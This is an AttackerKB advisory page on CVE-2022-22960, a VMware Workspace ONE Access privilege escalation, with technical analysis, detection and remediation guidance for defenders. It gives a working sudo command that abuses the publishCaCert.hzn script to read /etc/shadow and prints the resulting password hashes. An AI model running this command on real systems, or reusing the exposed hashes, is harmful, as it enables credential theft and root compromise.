Low
CVE-2022-22960
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Low
(1 user assessed)
Very High
(1 user assessed)Unknown
Unknown
Unknown
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Description
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to ‘root’.
Add Assessment
Ratings
-
Attacker ValueLow
-
ExploitabilityVery High
Technical Analysis
There exists a vulnerability within /usr/local/horizon/scripts/publishCaCert.hzn where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into /etc/ssl/certs which is owned by root. The script can be invoked by the horizon user without a sudo password.
The script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in /etc/ssl/certs.
A local user running as horizon (such as from successfully exploiting CVE-2022-22954) can exploit this vulnerability to recover the shadow file by executing:
horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7::: bin:x:18964:0:60:7::: daemon:x:18964:0:60:7::: messagebus:x:18964:0:60:7::: systemd-bus-proxy:x:18964:0:60:7::: systemd-journal-gateway:x:18964:0:60:7::: systemd-journal-remote:x:18964:0:60:7::: systemd-journal-upload:x:18964:0:60:7::: systemd-network:x:18964:0:60:7::: systemd-resolve:x:18964:0:60:7::: systemd-timesync:x:18964:0:60:7::: nobody:x:18964:0:60:7::: sshd:!:18964:0:60:7::: rabbitmq:!:18964::60:::: named:!:18964::60:::: postgres:!:18964:0:60:7::: horizon:!:18964:0:60:7::: sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7::: elasticsearch:!:18964::60::::
Detection
The file that is written to the /etc/ssl/certs directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.
Remediation
VMWare patched this issue with hotfix HW-154129. The patch for the affected script adds validation to ensure that the argument is a certificate file.
Diff:
< . /usr/local/horizon/scripts/hzn-bin.inc < openssl x509 -noout -in $CERTFILE 2>/dev/null < < if [ $? -ne 0 ]; then < echo "ERROR: This is not a certificate file" < exit 1 < fi <
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
Products
- VMware Workspace ONE Access, Identity Manager and vRealize Automation
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this report
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Additional Info
Technical Analysis
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
